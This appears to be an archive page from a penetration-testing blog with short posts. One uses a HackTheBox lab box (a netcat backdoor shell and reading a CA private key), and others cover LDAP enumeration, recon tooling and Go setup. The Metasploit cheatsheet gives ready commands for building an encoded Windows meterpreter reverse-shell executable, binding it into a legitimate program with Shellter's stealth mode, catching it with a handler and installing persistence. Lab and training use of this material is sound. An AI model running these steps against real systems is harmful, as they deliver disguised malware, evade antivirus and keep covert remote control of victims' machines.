Skip to main content

Posts

Showing posts from October, 2019

Creating Self Signed Certificate

Some times,we need a Self signed certificate. So, to create it we need the CA's website.cer file and CA's private key. lets download the ca certificate from the website  Import the certificate and save it Lets start creating a new certificate: Example from LaCasaDePapel rlwrap nc 10.10.10.131 6200 //gets a responsive shell scandir("/home/berin") file_get_contents("/home/nairobi/ca.key") Lets vertify the private key we have matches the certificate we have. openssl pkey -in ca.key -pubout -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13

Ldap Enum - Port 389,639, 3269

ldapsearch -x -h 10.10.10.119   ldapsearch -x -h 10.10.10.119 -s base namingcontexts   ldapsearch -x -h 10.10.10.119 -b 'dc=lightweight,dc=htb'  extended LDIF # # LDAPv3 # base <dc=lightweight,dc=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # lightweight.htb dn: dc=lightweight,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: lightweight htb dc: lightweight # Manager, lightweight.htb dn: cn=Manager,dc=lightweight,dc=htb objectClass: organizationalRole cn: Manager description: Directory Manager # People, lightweight.htb dn: ou=People,dc=lightweight,dc=htb objectClass: organizationalUnit ou: People # Group, lightweight.htb dn: ou=Group,dc=lightweight,dc=htb objectClass: organizationalUnit ou: Group # ldapuser1, People, lightweight.htb dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb uid: ldapuser1 cn: ldapuser1 sn: ldapuser1 mail: ldapuser1@lightweight.htb objectClass: person objectClass: organizationalPerson o

Nmap & Service Enumeration - Commands and Process

RustScan for High Speed Open Ports Detection https://github.com/RustScan/RustScan/releases download the debian package dpkg -i filename rustscan 10.10.10.10 rustscan 10.10.10.0/24 -p 80,443 --no-nmap or you can use masscan masscan --rate 15000 -oB myscan.mass 10.0.0.0/8 --ports 0-65535 Reconnoitre for service enum git clone https://github.com/codingo/Reconnoitre.git cd reconnoitre python setup.py install reconnoitre -t 10.10.10.10 --services -o new_recon Vanquish - Information Gathering git clone https://github.com/frizb/Vanquish.git cd Vanquish python2.7 Vanquish2.py -install echo 192.168.126.133 >> test.txt vanquish -hostFile test.txt -logging #read the output, located in hosts directory sn1per - Automated Enum git clone https://github.com/1N3/Sn1per cd Sn1per bash install.sh 1N3/Sn1per: Attack Surface Management Platform | Sn1perSecurity LLC (github.com) #NORMAL MODE + OSINT + RECON sniper -t <TARGET> -o -re sniper -t 10.10.10.10 -m vulnscan sniper -t 10.10.1

Metasploit Commands Cheatsheet

Basic Metasploit Commands msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe shellter --> shellter is a dynamic shellcode injection tool, it can be used in order to inject shellcode into native windows applications downlaod any program to bind our payload download and open shellter in windows Select "A" select "N" drag the program to which our payload is to be binded select "stealth mode" y L 1 set attacker_ip set port 8080 -------------------------------- msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp show options set lport 8080 MAINTAINING PERSISTANT CONNECTION #get into a meterpreter connection first background use exploit/windows/local/persistence show options set EXE_NAME service1 set DELAY 10 sessions -i /show sessions set session 3 show advanced set EXE::CUSTOM /root/Desktop/

Installing Go Packages

apt-get install golang go run main.go       //most likely we will be missing few pacakges export GOPATH=/root/go               //Export go Path mkdir /root/go                             //make sure that path exists go get github.com/satori/go.uuid     //Downloading and installing packages in go go get golang.org/x/crypoto/ssh/terminakl       //Downloading and installing packages in go go run main.go go build     //compile a file -- creates an executable Installing go for Developers go to https://golang.org/dl/ and copy the link  - or you can refer to this link wget https://dl.google.com/go/go1.14.3.linux-amd64.tar.gz tar -xvf  go1.14.3.linux-amd64.tar.gz -C /usr/local chown -R root:root /usr/local/go  nano ~/.profile                  # add these at bottom export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin go version Installing go --> Easy   Follow the below process to run go scipts from anywhere in the operating system.  apt i